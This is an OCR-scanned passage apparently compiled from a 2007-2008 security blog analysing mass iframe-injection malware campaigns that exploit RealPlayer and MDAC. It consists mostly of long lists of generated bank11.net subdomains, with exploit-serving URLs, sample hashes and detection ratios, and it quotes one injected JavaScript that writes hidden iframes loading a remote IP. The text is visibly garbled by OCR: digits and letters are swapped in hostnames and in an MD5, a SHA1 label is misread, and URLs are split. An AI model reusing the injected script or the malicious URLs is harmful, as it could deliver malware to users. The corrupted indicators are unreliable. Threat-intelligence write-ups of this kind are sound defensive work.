ns1.ns1.ns8.ns4.bank11.net 
ns1.ns1.ns8.ns8.ns3.ns7.ns3.ns5.ns4.bank11.net 
ns1.ns2.ns1.ns8.ns7.ns6.ns4.bank11.net 
ns1.ns2.ns3.ns1.bank11.net 
ns1.ns2.ns3.ns1.ns1.ns3.bank11.net 
ns1.ns2.ns3.ns1.ns2.ns8.ns7.ns4.bank11.net 
ns1.ns2.ns3.ns6.ns3.ns2.ns4.ns1.bank11.net 
ns1.ns2.ns4.ns6.ns7.ns4.ns7.ns1.bank11.net 
ns1.ns2.ns5.ns3.bank11.net 
ns1.ns2.ns6.ns1.ns2.ns3.bank11.net 
ns1.ns2.ns6.ns5.ns2.ns1.ns4.bank11.net 
ns1.ns2.ns7.ns1.bank11.net 


nsl.ns2.ns7.ns5.ns7.ns1.ns2.bank11.net 
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ns1.ns2.ns8.ns2.ns4.ns1.ns3.bank11.net 
ns1.ns2.ns8.ns4.ns4.bank11.net 
ns1.ns3.ns1.ns4.bank11.net 
ns1.ns3.ns2.ns8.ns1.bank11.net 
ns1.ns3.ns3.ns6.ns7.ns8.ns3.ns1.bank11.net 
ns1.ns3.ns3.ns8.ns5.ns5.ns5.ns4.bank11.net 
ns1.ns3.ns6.ns3.nsl1.bank11.net 
ns1.ns3.ns6.ns5.ns5.ns4.ns7.ns4.bank11.net 
ns1.ns3.ns8.ns2.ns7.ns3.bank11.net 
ns1.ns3.ns8.ns5.ns2.ns8.ns3.bank11.net 
ns1.ns3.ns8.ns5.ns5.ns5.ns4.bank11.net 
ns1.ns3.ns8.ns5.ns5.ns7.ns2.bank11.net 
ns1.ns4.ns1.ns7.ns5.ns3.bank11.net 
ns1.ns4.ns2.ns1.bank11.net 
ns1.ns4.ns4.ns2.ns7.ns4.bank11.net 
ns1.ns4.ns5.ns4.ns1.ns7.ns6.ns4.bank11.net 
ns1.ns4.ns7.ns1.ns1.ns1.bank11.net 
ns1.ns4.ns7.ns2.ns6.ns8.ns5.ns3.bank11.net 
ns1.ns5.ns2.ns2.bank11.net 
ns1.ns5.ns2.ns2.ns6.ns1.bank11.net 
ns1.ns5.ns2.ns3.ns8.ns7.ns6.ns4.bank11.net 
ns1.ns5.ns2.ns5.ns3.ns3.bank11.net 
ns1.ns5.ns2.ns8.ns7.ns4.bank11.net 
ns1.ns5.ns3.ns7.ns8.ns6.ns3.bank11.net 
ns1.ns5.ns4.ns2.ns7.ns2.bank11.net 
ns1.ns5.ns4.ns5.ns7.ns2.bank11.net 
ns1.ns5.ns5.ns1.ns8.ns3.ns2.bank11.net 
ns1.ns5.ns5.ns2.ns3.ns4.ns2.bank11.net 
ns1.ns5.ns5.ns2.ns6.ns8.ns4.ns2.bank11.net 
ns1.ns5.ns7.ns6.ns8.ns5.ns2.bank11.net 
ns1.ns5.ns8.ns4.ns4.ns3.bank11.net 
ns1.ns6.ns1.ns4.ns6.ns5.ns6.ns2.bank11.net 
ns1.ns6.ns1.ns5.ns3.ns4.bank11.net 
ns1.ns6.ns2.ns5.ns5.ns1.ns5.ns4.bank11.net 


ns1.ns6.ns4.ns5.nsl.bank11.net 
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ns1.ns6.ns6.ns7.ns8.ns2.ns2.bank11.net 
ns1.ns6.ns7.ns1.bank11.net 
ns1.ns6.ns7.ns1.ns6.ns8.ns1.ns2.bank11.net 
ns1.ns6.ns8.ns2.ns1.ns8.ns5.ns2.bank11.net 
ns1.ns6.ns8.ns2.ns5.ns8.ns1.ns4.bank11.net 
ns1.ns6.ns8.ns6.ns4.ns3.ns1.ns4.bank11.net 
ns1.ns6.ns8.ns6.ns4.ns6.ns4.bank11.net 
ns1.ns7.ns2.ns8.ns2.ns1.ns3.bank11.net 
ns1.ns7.ns4.ns1.bank11.net 
ns1.ns7.ns4.ns7.ns3.ns1.bank11.net 


nsl1.ns7.ns5.ns3.ns4.bank11.net 


nsl1.ns7.ns5.ns6.ns4.ns3.ns7.ns5.ns1.ns2.bank11.net 


ns1.ns7.ns6.ns2.bank11.net 
ns1.ns7.ns6.ns5.ns7.ns2.ns3.bank11.net 
ns1.ns7.ns6.ns6.ns1.ns2.ns3.bank11.net 
ns1.ns7.ns8.ns3.ns6.ns7.ns3.bank11.net 
ns1.ns7.ns9.ns8.ns2.ns7.ns1.bank11.net 
ns1.ns8.ns1.ns3.ns4.ns2.ns3.bank11.net 
ns1.ns8.ns2.ns4.bank11.net 
ns1.ns8.ns2.ns5.ns8.ns1.ns4.bank11.net 
ns1.ns8.ns3.ns2.bank11.net 
ns1.ns8.ns4.ns3.ns1.bank11.net 
ns1.ns8.ns5.ns3.ns3.ns4.bank11.net 
ns1.ns8.ns6.ns1.bank11.net 
ns1.ns8.ns6.ns4.bank11.net 
ns1.ns8.ns6.ns6.ns6.ns2.ns1.bank11.net 
ns1.ns8.ns7.ns3.ns3.ns2.bank11.net 
ns1.ns8.ns8.ns2.bank11.net 
ns2.ns1.ns1.ns5.ns2.ns7.ns8.ns1.bank11.net 
ns2.ns1.ns2.ns1.ns8.ns7.ns6.ns4.bank11.net 
ns2.ns1.ns2.ns2.ns6.ns1.bank11.net 
ns2.ns1.ns3.ns4.ns7.ns5.ns3.ns4.bank11.net 
ns2.ns1.ns4.ns4.ns4.bank11.net 
ns2.ns1.ns5.ns3.ns5.ns7.ns2.bank11.net 


ns2.nsl.ns7.ns4.ns5.ns2.ns8.ns3.bank11.net 
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ns2.ns1.ns7.ns7.ns5.ns8.ns5.ns6.ns2.ns4.bank11.net 
ns2.ns1.ns8.ns6.ns3.bank11.net 
ns2.ns2.ns1.ns5.ns2.ns7.ns8.ns1.bank11.net 
ns2.ns2.ns3.ns6.ns1.ns1.ns4.bank11.net 
ns2.ns2.ns4.ns3.ns5.ns7.ns2.ns3.bank11.net 
ns2.ns2.ns4.ns7.ns3.ns7.ns4.bank11.net 
ns2.ns2.ns5.ns3.ns2.bank11.net 
ns2.ns2.ns7.ns1.ns3.ns8.ns3.bank11.net 
ns2.ns2.ns7.ns2.ns3.bank11.net 
ns2.ns2.ns7.ns2.ns4.bank11.net 
ns2.ns2.ns8.ns4.bank11.net 
ns2.ns3.ns2.ns1.bank11.net 
ns2.ns3.ns2.ns8.ns6.ns8.ns7.ns1.bank11.net 
ns2.ns3.ns4.ns1.ns6.ns3.bank11.net 
ns2.ns3.ns5.ns2.bank11.net 
ns2.ns3.ns5.ns5.ns5.ns4.bank11.net 
ns2.ns3.ns8.ns7.ns7.ns8.ns2.bank11.net 
ns2.ns4.ns1.ns2.bank11.net 
ns2.ns4.ns2.ns8.ns6.ns8.ns7.ns1.bank11.net 
ns2.ns4.ns3.ns3.bank11.net 
ns2.ns4.ns5.ns5.ns7.ns8.ns2.ns2.bank11.net 
ns2.ns4.ns6.ns7.ns4.ns7.ns1.bank11.net 
ns2.ns4.ns6.ns7.ns5.ns2.bank11.net 
ns2.ns4.ns7.ns2.ns2.ns8.ns4.bank11.net 
ns2.ns4.ns7.ns8.ns6.ns4.bank11.net 
ns2.ns4.ns8.ns6.ns7.ns1.bank11.net 
ns2.ns4.ns8.ns8.ns5.ns1.bank11.net 
ns2.ns5.ns2.ns4.bank11.net 
ns2.ns5.ns3.ns3.nsl1.ns1.bank11.net 
ns2.ns5.ns3.ns4.ns7.ns3.bank11.net 
ns2.ns5.ns4.ns3.ns6.ns7.ns8.ns3.ns1.bank11.net 
ns2.ns5.ns4.ns6.ns3.bank11.net 
ns2.ns5.ns6.ns8.ns4.ns4.ns4.ns1.bank11.net 
ns2.ns5.ns8.ns1.ns4.bank11.net 


ns2.ns5.ns8.ns5.ns3.ns5.ns7.ns2.bank11.net 
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Result: 27/31 (87.10 %) 

File size: 19501 bytes 

MD5: 7b101f7baeaeQebab9eccO06fdb9542dc 

SHA1: 36ffa50ce3873fb04c13c80421c205a7760f47ca 


The binary is using a default set of known executables of anti malware products, and is 
installing a default debugger injected upon execution of any of these, and is therefore suc- 
cessfully killing many of the applications. 


Another exploit serving domain with a very diverse set of exploits used, but again serv- 
ing the faddish RealPlayer plus MDAC combination is uc147.com (218.107.216.85) : 


uc147.com/test/MS07004.htm 
uc147.com/test/PPs.htm 
uc147.com/test/biaxing06014.Htm 
uc147.com/test/index.htm 
uc147.com/test/Click here.html 
uc147.com/test/PPLIVE.htm 
uc147.com/test/Thunder.html 
uc147.com/test/bf.htm 
uc147.com/test/Open.htm 
uc147.com/test/ms06014.htm 
uc147.com/test/jetAudio %207.x.htm 


where all are trying to load uc147.com/zy.exe : 


Result: 24/32 (75 %) 

File size: 15456 bytes 

MD5: 3a0804d8e12706e97cdda6aa4f50ef5f 

SHAIL: cfd2f158a658dc0d8618c35806b94008b4fb1c0f 


The third domain is great example of what’s an emerging trend rather than a fad, namely the 
use of comprehensive multiple IFRAMES loading campaigns. qx13.cn/3.htm (61.174.61.94) 
(IE COM CreateObject Code Execution (MS06-042) which loads sp.070808.net/23.htm, 
(75.126.3.218) where the following try to load as well : 


sp.070808.net/in.htm 
wc.070808.net/37.htm 
az.sbb22.com/hh.htm 
um.uuzzvv.com/uu.htm 
fa.55189.net 
acc.jqxx.org/40.htm 
ktv.mm5208.com/25.htm 


Two other IFRAMES within within qx13.cn/3.htm, w.aeaer.com/ae.htm (75.126.3.216) loads 
the same IFRAMES, and qi.ccbtv.net/btv.htm (66.90.79.138) again loads the same IFRAMEs. 
It gets even more complicated and the ecosystem more comprehensive as the secondary 
IFRAMEs logically load many others such as : 
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ns2.ns6.ns2.ns1.bank11.net 
ns2.ns6.ns2.ns3.ns1.ns2.ns8.ns7.ns4.bank11.net 
ns2.ns6.ns2.ns3.ns3.ns1.bank11.net 
ns2.ns6.ns2.ns6.ns1.ns7.ns6.ns4.bank11.net 
ns2.ns6.ns4.ns8.ns8.ns3.bank11.net 
ns2.ns6.ns5.ns3.ns5.ns8.ns4.bank11.net 
ns2.ns6.ns5.ns7.ns6.ns2.ns3.ns4.bank11.net 
ns2.ns6.ns6.ns2.ns3.ns4.ns1.bank11.net 
ns2.ns6.ns7.ns1.ns2.ns7.ns1.bank11.net 
ns2.ns6.ns7.ns3.ns2.ns2.bank11.net 
ns2.ns6.ns7.ns4.ns6.ns8.ns3.bank11.net 
ns2.ns6.ns7.ns6.ns7.ns1.bank11.net 
ns2.ns6.ns8.ns3.bank11.net 
ns2.ns6.ns8.ns7.ns7.ns8.ns3.bank11.net 
ns2.ns7.ns1.ns5.ns2.ns7.ns8.ns1.bank11.net 
ns2.ns7.ns2.ns5.ns3.ns4.ns7.ns3.bank11.net 
ns2.ns7.ns3.ns1.bank11.net 
ns2.ns7.ns5.ns5.ns8.ns3.ns6.ns4.bank11.net 
ns2.ns7.ns5.ns8.ns5.ns6.ns2.ns4.bank11.net 
ns2.ns7.ns6.ns4.ns2.ns2.ns8.ns3.bank11.net 
ns2.ns7.ns7.ns3.ns4.ns2.bank11.net 
ns2.ns7.ns7.ns5.ns8.ns5.ns6.ns2.ns4.bank11.net 
ns2.ns7.ns8.ns8.ns4.bank11.net 
ns2.ns8.ns3.nsl1.bank11.net 
ns2.ns8.ns3.ns2.ns2.bank11.net 
ns2.ns8.ns3.ns3.bank11.net 
ns2.ns8.ns3.ns8.ns3.bank11.net 
ns2.ns8.ns4.ns2.ns5.ns2.bank11.net 
ns2.ns8.ns7.ns1.ns6.ns6.ns8.ns3.bank11.net 
ns2.ns8.ns7.ns4.bank11.net 
ns2.ns8.ns8.ns3.bank11.net 
ns3.ns1.ns2.ns2.bank11.net 
ns3.ns1.ns2.ns8.ns7.ns4.bank11.net 
ns3.nsl1.ns4.ns1.bank11.net 


ns3.nsl1.ns5.ns2.ns2.ns6.nsl.bank11.net 
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ns3.ns1.ns5.ns4.ns5.ns5.ns7.ns2.bank11.net 
ns3.ns1.ns6.ns2.bank11.net 
ns3.ns1.ns6.ns5.ns4.bank11.net 
ns3.ns1.ns6.ns7.ns4.ns6.ns8.ns3.bank11.net 
ns3.ns1.ns6.ns7.ns8.ns3.ns1.bank11.net 
ns3.ns1.ns7.ns6.ns1.ns3.bank11.net 
ns3.ns1.ns8.ns4.ns1.bank11.net 
ns3.ns2.ns2.ns1.bank11.net 
ns3.ns2.ns4.ns1.bank11.net 
ns3.ns2.ns4.ns3.bank11.net 
ns3.ns2.ns4.ns4.bank11.net 
ns3.ns2.ns4.ns8.ns5.ns1.ns2.bank11.net 
ns3.ns2.ns5.ns3.ns5.ns4.ns4.bank11.net 
ns3.ns2.ns6.ns2.ns3.ns3.ns1.bank11.net 
ns3.ns2.ns7.ns1.bank11.net 
ns3.ns2.ns8.ns2.ns1.ns3.bank11.net 
ns3.ns2.ns8.ns3.ns3.ns5.ns2.bank11.net 
ns3.ns2.ns8.ns5.ns4.ns2.ns2.bank11.net 
ns3.ns3.ns1.ns2.ns8.ns7.ns4.bank11.net 
ns3.ns3.ns3.ns1.ns2.ns4.bank11.net 
ns3.ns3.ns4.ns1.ns4.ns4.bank11.net 
ns3.ns3.ns4.ns6.ns4.ns4.bank11.net 
ns3.ns3.ns5.ns2.bank11.net 
ns3.ns3.ns5.ns2.ns1.ns3.ns3.bank11.net 
ns3.ns3.ns5.ns7.ns4.ns7.ns5.ns2.ns1.bank11.net 
ns3.ns3.ns6.ns2.ns6.ns8.ns1.bank11.net 
ns3.ns3.ns6.ns5.ns4.ns7.ns7.ns1.bank11.net 
ns3.ns3.ns7.ns5.ns2.ns4.ns1.bank11.net 
ns3.ns3.ns7.ns6.ns4.ns3.bank11.net 
ns3.ns4.ns1.ns4.bank11.net 
ns3.ns4.ns1.ns4.ns4.bank11.net 
ns3.ns4.ns1.ns6.ns5.ns4.bank11.net 
ns3.ns4.ns2.ns3.bank11.net 
ns3.ns4.ns2.ns6.ns6.ns6.ns1.ns5.ns3.bank11.net 


ns3.ns4.ns3.ns3.ns6.ns2.ns2.bank11.net 
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ns3.ns4.ns3.ns8.ns5.ns2.ns6.ns2.bank11.net 
ns3.ns4.ns3.ns8.ns6.ns2.ns2.bank11.net 
ns3.ns4.ns4.ns5.ns8.ns7.ns1.bank11.net 
ns3.ns4.ns4.ns8.ns6.ns4.ns7.ns4.bank11.net 


ns3.ns4.ns5.ns1.ns3.ns6.ns2.bank11.net 


ns3.ns4.ns7.ns2.ns6.ns8.ns3.ns5.ns3.bank11.net 


ns3.ns4.ns7.ns3.bank11.net 
ns3.ns4.ns7.ns4.ns5.ns8.ns3.bank11.net 


ns3.ns4.ns7.ns5.ns3.ns8.ns4.ns3.bank11.net 


ns3.ns4.ns7.ns8.ns6.ns4.ns3.ns1.ns4.bank11.net 


ns3.ns4.ns7.ns8.ns6.ns4.ns6.ns2.bank11.net 
ns3.ns4.ns8.ns1.ns4.ns1.bank11.net 
ns3.ns4.ns8.ns2.ns1.ns8.ns5.ns2.bank11.net 
ns3.ns4.ns8.ns8.ns7.ns1.ns7.ns3.bank11.net 
ns3.ns5.ns1.ns6.ns7.ns7.ns8.ns3.bank11.net 
ns3.ns5.ns1.ns8.ns2.ns8.ns8.ns3.bank11.net 
ns3.ns5.ns2.ns1.ns4.bank11.net 
ns3.ns5.ns2.ns6.ns4.ns8.ns8.ns3.bank11.net 
ns3.ns5.ns4.ns4.bank11.net 
ns3.ns5.ns4.ns8.ns4.ns8.ns7.ns2.bank11.net 
ns3.ns5.ns5.ns5.ns6.ns1.bank11.net 
ns3.ns5.ns5.ns7.ns2.ns2.ns8.ns4.bank11.net 
ns3.ns5.ns6.ns3.ns3.ns1.bank11.net 
ns3.ns5.ns6.ns5.ns6.ns2.bank11.net 
ns3.ns5.ns6.ns6.ns6.ns2.bank11.net 
ns3.ns5.ns6.ns8.ns4.ns4.ns4.ns1.bank11.net 


ns3.ns5.ns7.ns4.bank11.net 


ns3.ns5.ns8.ns5.ns7.ns3.ns1.ns6.ns3.bank11.net 


ns3.ns6.ns1.ns2.ns6.ns4.bank11.net 
ns3.ns6.ns1.ns3.ns2.bank11.net 
ns3.ns6.ns2.ns2.ns4.ns3.ns2.bank11.net 
ns3.ns6.ns2.ns3.bank11.net 
ns3.ns6.ns2.ns3.ns1.ns4.ns1.bank11.net 
ns3.ns6.ns2.ns4.bank11.net 


ns3.ns6.ns4.ns1.ns4.ns1.ns4.bank11.net 
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ns3.ns6.ns4.ns2.ns7.ns2.bank11.net 
ns3.ns6.ns4.ns3.ns1.bank11.net 
ns3.ns6.ns4.ns6.ns2.ns3.ns3.ns1.bank11.net 
ns3.ns6.ns4.ns8.ns2.ns6.ns1.bank11.net 
ns3.ns6.ns4.ns8.ns5.ns1.ns8.ns1.bank11.net 
ns3.ns6.ns5.ns1.ns4.ns8.ns2.bank11.net 
ns3.ns6.ns5.ns1.ns5.ns1.bank11.net 
ns3.ns6.ns5.ns2.ns2.ns7.ns7.ns2.bank11.net 
ns3.ns6.ns5.ns4.ns1.ns3.bank11.net 
ns3.ns6.ns6.ns2.bank11.net 
ns3.ns6.ns6.ns3.ns5.ns7.ns4.ns7.ns1.bank11.net 
ns3.ns6.ns6.ns4.ns6.ns2.bank11.net 
ns3.ns6.ns7.ns4.ns5.ns1.ns4.ns4.ns1.bank11.net 
ns3.ns6.ns7.ns5.ns1.ns1.bank11.net 
ns3.ns6.ns7.ns5.ns7.ns1.ns2.bank11.net 
ns3.ns6.ns8.ns2.bank11.net 
ns3.ns6.ns8.ns3.ns8.ns3.bank11.net 
ns3.ns7.ns1.ns4.ns4.ns2.ns4.bank11.net 
ns3.ns7.ns2.ns1.ns2.ns2.ns6.ns1.bank11.net 
ns3.ns7.ns2.ns3.ns5.ns1.ns1.bank11.net 
ns3.ns7.ns2.ns5.nsl1.bank11.net 
ns3.ns7.ns2.ns8.ns8.ns4.ns6.ns6.ns4.bank11.net 
ns3.ns7.ns3.ns1.bank11.net 
ns3.ns7.ns3.ns1.ns6.ns3.bank11.net 
ns3.ns7.ns3.ns1.ns8.ns2.ns6.ns1.bank11.net 
ns3.ns7.ns5.ns6.ns2.ns6.ns8.ns1.bank11.net 
ns3.ns7.ns7.ns3.ns1.ns6.ns3.bank11.net 
ns3.ns7.ns8.ns1.bank11.net 
ns3.ns7.ns8.ns2.ns4.ns4.ns4.bank11.net 
ns3.ns7.ns8.ns4.bank11.net 
ns3.ns8.ns1.ns2.ns8.ns8.ns6.ns3.bank11.net 
ns3.ns8.ns1.ns5.ns6.ns2.ns4.bank11.net 
ns3.ns8.ns1.ns6.ns7.ns6.ns7.ns1.bank11.net 
ns3.ns8.ns1.ns6.ns8.ns7.ns3.ns3.ns2.bank11.net 


ns3.ns8.ns2.ns7.ns4.ns7.ns7.nsl.bank11.net 
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ns3.ns8.ns3.ns1.ns5.ns5.ns3.bank11.net 
ns3.ns8.ns3.ns5.ns2.ns6.ns8.ns1.bank11.net 
ns3.ns8.ns4.ns5.ns1.ns7.ns4.ns8.ns1.bank11.net 
ns3.ns8.ns4.ns8.ns2.ns6.ns2.ns2.bank11.net 
ns3.ns8.ns5.ns5.ns5.ns4.bank11.net 
ns3.ns8.ns6.ns2.ns2.bank11.net 
ns3.ns8.ns6.ns8.ns8.ns2.ns3.bank11.net 
ns3.ns8.ns7.ns2.bank11.net 
ns3.ns8.ns7.ns7.ns8.ns3.bank11.net 
ns3.ns8.ns8.ns2.ns1.ns7.ns3.bank11.net 
ns3.ns8.ns8.ns3.ns5.ns2.ns1.ns4.bank11.net 
ns3.ns9.ns5.ns2.ns4.ns1.bank11.net 
ns4.mx1.ns6.ns4.ns2.ns4.bank11.net 
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68yu.cn/s29.htm 
ermei.loveyoushipin.com/pic/9041.htm 
yun.yun878.com/web/6619038.htm 
ppp. 749571.com/ww/new82.htm 
2.xks08.com/dm1.htm?60 
ad.2365.us/110 


The more complicated and dynamic these IFRAME-ing attacks get, the higher the cam- 
paign’s lifecycle becomes, making it harder the determine where’s the weakest link, and 
making it easier for the malicious parties to evaluate which node needs a boost by including 
new domains spread across different netblocks like this case. 


1. http: //ddanchev. blogspot .com/2008/01/massive-realplayer-exploit-embedded. htm 
2. http: //ddanchev. blogspot .com/2007/12/mdac-activex-code-execution-exploit.htm 


4.1.5 The Pseudo "Real Players" (2008-01-15 00:28) 


document .writeln("<iframe src=\"http:\/\/isc.sans.org\" width=\"458\" height=\"456\" 
scrolling=\"yes\" frameborder=\"6\"><\/iframe><ifrane 
sre=\"“http:\/\/61.188 .39.218\/pingback .txt\" width=\"6\" height=\"6\" scrolling=\"no\" 


frameborder=\"6\"><\/iframe>") ; 


What happened with the recent [1]RealPlayer massive embedded malware attack? Two of 
the main hosts are now, and the third one ucmal.com/0.js is strangely loading an iframe to 
[2]ISC’s blog in between the following 61.188.39.218/pingback.txt which was returning the 
following message during the last couple of hours "You’re welcome for being saved from near 
infection". 


As I’m sure others too like to analyze post incident response behavior of the malicious 
parties, in respect to this particular attack, during the weekend they took advantage of 
what’s now [3]a patent of the Russian Business Network, namely to serve a fake 404 error 
message but continue the campaign. However, in RBN’s case, only the indexes were serving 
the fake account suspended messages, but the campaign was still active on the rest of the 
internal pages. In the RealPlayer’s campaign case, the 404 error messages themselves were 
embedded with the same IFRAMEs as well, in order to make it look like there’s an error, at 
least in front of the eyes of the average Internet user. 


Despite that the main campaign domains are blocked on a worldwide scale, the hun- 
dreds of thousands of sites that originally participated are still not clean and continue trying 
to load the now down domains. Moreover, the big picture has to do with a fourth domain as 
well, [4]yl18.net/0.js, that used to be a part of the same type of massive malware embedded 
attack in November, 2007. 


Why pseudo "real players" anyway? Because for this attack, they took advantage of 
what can be defined as a fad, namely the use seperate exploit as the cornerstone of the 
campaign, at least if its massive infection they wanted to achieve. The "real players" or 
script kiddies on the majority of occasions, serve exploits on a client-side matching basis, 
and therefore the more diverse the exploits set, the higher the probability a vulnerable 
application will be detected and exploited. Therefore, given the number of sites affected it 
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ns6.ns8.ns8.ns3.ns1.ns8.ns6.ns4.bank11.net 
ns6.ns8.ns8.ns8.ns7.ns1.ns7.ns3.bank11.net 
ns7.ns1.ns1.ns5.ns2.ns8.ns7.ns4.bank11.net 
ns7.ns1.ns1.ns7.ns5.ns3.ns3.bank11.net 
ns7.ns1.ns1.ns8.ns2.bank11.net 
ns7.ns1.ns2.ns1.bank11.net 
ns7.ns1.ns2.ns7.ns1.bank11.net 
ns7.ns1.ns2.ns7.ns7.ns7.ns3.bank11.net 
ns7.ns1.ns3.ns2.ns8.ns2.ns1.ns3.bank11.net 
ns7.ns1.ns3.ns3.ns3.ns1.ns2.ns4.bank11.net 
ns7.ns1.ns3.ns5.ns1.ns1.bank11.net 
ns7.ns1.ns5.ns1.ns1.bank11.net 
ns7.ns1.ns5.ns5.ns2.ns3.ns4.ns2.bank11.net 
ns7.ns1.ns5.ns8.ns3.ns6.ns4.bank11.net 
ns7.ns1.ns7.ns4.ns5.ns4.ns2.ns2.bank11.net 
ns7.ns1.ns7.ns6.ns6.ns1.ns2.ns3.bank11.net 
ns7.ns1.ns8.ns1.ns7.ns6.ns1.ns3.bank11.net 
ns7.ns1.ns8.ns3.bank11.net 
ns7.ns2.ns1.ns7.ns3.ns4.bank11.net 
ns7.ns2.ns2.ns6.ns6.ns7.ns1.ns3.bank11.net 
ns7.ns2.ns3.ns5.ns1.ns1.bank11.net 
ns7.ns2.ns4.ns4.ns5.ns8.ns7.ns1.bank11.net 
ns7.ns2.ns5.ns4.ns4.ns6.ns8.ns3.bank11.net 
ns7.ns2.ns5.ns5.ns1.ns5.ns4.bank11.net 


ns7.ns2.ns5.ns6.ns7.ns8.ns2.ns2.bank11.net 


12615 


ns7.ns2.ns6.ns8.ns5.ns3.bank11.net 
ns7.ns2.ns6.ns8.ns7.ns7.ns8.ns3.bank11.net 
ns7.ns2.ns7.ns4.ns1.ns3.bank11.net 
ns7.ns3.ns1.ns8.ns1.ns2.ns1.bank11.net 
ns7.ns3.ns1.ns8.ns2.ns6.ns1.bank11.net 
ns7.ns3.ns2.ns4.bank11.net 
ns7.ns3.ns2.ns8.ns1.bank11.net 
ns7.ns3.ns3.ns5.ns2.bank11.net 
ns7.ns3.ns4.ns2.ns8.ns6.ns4.ns6.ns2.bank11.net 
ns7.ns3.ns5.ns5.ns5.ns4.bank11.net 
ns7.ns3.ns6.ns1.ns5.ns3.bank11.net 
ns7.ns3.ns7.ns3.ns1.ns8.ns2.ns6.ns1.bank11.net 
ns7.ns3.ns7.ns4.bank11.net 
ns7.ns4.ns1.ns4.bank11.net 
ns7.ns4.ns1.ns6.ns7.ns2.ns6.ns3.bank11.net 
ns7.ns4.ns2.ns6.ns1.ns8.ns3.bank11.net 
ns7.ns4.ns4.ns4.ns6.ns8.ns3.bank11.net 
ns7.ns4.ns5.ns4.ns5.ns5.ns2.bank11.net 
ns7.ns4.ns5.ns7.ns3.bank11.net 
ns7.ns4.ns6.ns8.ns3.bank11.net 
ns7.ns4.ns7.ns1.ns1.ns1.bank11.net 
ns7.ns4.ns7.ns2.ns6.ns8.ns5.ns3.bank11.net 
ns7.ns4.ns8.ns2.ns1.ns7.ns8.ns4.ns3.bank11.net 
ns7.ns5.ns1.ns4.ns4.ns4.bank11.net 
ns7.ns5.ns2.ns3.bank11.net 
ns7.ns5.ns2.ns3.ns4.ns2.bank11.net 
ns7.ns5.ns2.ns8.ns8.ns4.ns6.ns6.ns4.bank11.net 
ns7.ns5.ns3.ns3.bank11.net 
ns7.ns5.ns3.ns4.ns1.ns2.ns6.ns4.bank11.net 
ns7.ns5.ns3.ns4.ns1.ns4.ns4.bank11.net 
ns7.ns5.ns4.ns2.bank11.net 
ns7.ns5.ns5.ns6.ns4.ns3.ns8.ns4.bank11.net 
ns7.ns5.ns6.ns3.ns3.ns4.ns4.ns3.bank11.net 
ns7.ns5.ns6.ns7.ns8.ns2.ns2.bank11.net 


ns7.ns5.ns6.ns8.ns3.ns4.bank11.net 
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ns7.ns5.ns7.ns1.ns3.ns8.ns3.bank11.net 
ns7.ns5.ns8.ns3.bank11.net 
ns7.ns5.ns8.ns3.ns7.ns8.ns3.ns4.bank11.net 
ns7.ns5.ns8.ns4.bank11.net 
ns7.ns5.ns8.ns8.ns4.ns5.ns7.ns2.bank11.net 
ns7.ns6.ns1.ns1.ns5.ns4.ns2.ns7.ns1.bank11.net 
ns7.ns6.ns1.ns3.bank11.net 
ns7.ns6.ns1.ns8.ns5.ns6.ns4.bank11.net 
ns7.ns6.ns3.ns4.bank11.net 
ns7.ns6.ns4.ns4.ns7.ns1.bank11.net 
ns7.ns6.ns5.ns4.ns4.ns4.ns4.bank11.net 
ns7.ns6.ns5.ns6.ns2.bank11.net 
ns7.ns6.ns5.ns8.ns2.ns8.ns1.bank11.net 
ns7.ns6.ns6.ns1.ns2.ns3.bank11.net 
ns7.ns6.ns6.ns4.ns5.ns2.bank11.net 
ns7.ns6.ns6.ns6.ns1.ns5.ns2.bank11.net 
ns7.ns6.ns7.ns2.ns3.ns1.ns4.bank11.net 
ns7.ns6.ns8.ns2.bank11.net 
ns7.ns6.ns8.ns4.ns5.ns7.ns2.bank11.net 
ns7.ns6.ns8.ns6.ns4.ns6.ns4.bank11.net 
ns7.ns7.ns1.ns3.ns6.ns2.ns2.bank11.net 
ns7.ns7.ns3.ns4.ns7.ns6.ns2.ns2.bank11.net 
ns7.ns7.ns4.ns1.bank11.net 
ns7.ns7.ns4.ns6.ns5.ns7.ns4.bank11.net 
ns7.ns7.ns5.ns3.bank11.net 
ns7.ns7.ns5.ns3.ns4.bank11.net 
ns7.ns7.ns5.ns5.ns7.ns2.bank11.net 
ns7.ns7.ns6.ns6.ns3.ns7.ns4.ns2.bank11.net 
ns7.ns7.ns7.ns8.ns4.ns2.bank11.net 
ns7.ns7.ns8.ns8.ns6.ns2.ns2.bank11.net 
ns7.ns8.ns2.ns1.ns7.ns8.ns4.ns3.bank11.net 
ns7.ns8.ns2.ns4.ns3.ns7.ns7.ns1.bank11.net 
ns7.ns8.ns2.ns7.ns5.ns4.ns2.ns6.ns2.bank11.net 
ns7.ns8.ns3.ns2.bank11.net 


ns7.ns8.ns3.ns4.ns6.ns5.ns7.ns4.bank11.net 
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ns7.ns8.ns3.ns6.ns7.ns3.bank11.net 
ns7.ns8.ns4.ns4.bank11.net 
ns7.ns8.ns5.ns2.ns8.ns3.ns5.ns4.bank11.net 
ns7.ns8.ns6.ns3.nsl1.bank11.net 
ns7.ns8.ns7.ns3.ns6.ns4.bank11.net 
ns7.ns8.ns7.ns4.ns5.ns1.ns4.ns3.ns4.bank11.net 
ns7.ns8.ns7.ns8.ns5.ns3.bank11.net 
ns8.ns1.ns1.ns1.bank11.net 
ns8.ns1.ns1.ns7.ns1.ns2.ns3.ns2.bank11.net 
ns8.ns1.ns2.ns1.bank11.net 
ns8.ns1.ns2.ns3.ns4.ns1.ns6.ns3.bank11.net 
ns8.ns1.ns4.ns2.bank11.net 
ns8.ns1.ns5.ns4.bank11.net 
ns8.ns1.ns6.ns2.ns2.ns7.ns2.ns3.bank11.net 
ns8.ns1.ns6.ns4.bank11.net 
ns8.ns1.ns6.ns4.ns5.ns1.bank11.net 
ns8.ns1.ns6.ns6.ns7.ns8.ns2.ns2.bank11.net 
ns8.ns2.ns1.ns1.bank11.net 
ns8.ns2.ns1.ns3.ns4.ns2.bank11.net 
ns8.ns2.ns1.ns8.ns2.ns6.ns1.bank11.net 
ns8.ns2.ns2.ns2.ns1.ns3.ns3.bank11.net 
ns8.ns2.ns2.ns3.ns6.ns4.bank11.net 
ns8.ns2.ns3.ns1.ns6.ns3.bank11.net 
ns8.ns2.ns4.ns3.ns5.ns7.ns2.ns3.bank11.net 
ns8.ns2.ns4.ns6.ns8.ns4.ns5.ns5.ns3.bank11.net 
ns8.ns2.ns5.ns6.nsl1.ns1.bank11.net 
ns8.ns2.ns5.ns7.ns2.ns1.bank11.net 
ns8.ns2.ns7.ns6.ns4.ns3.bank11.net 
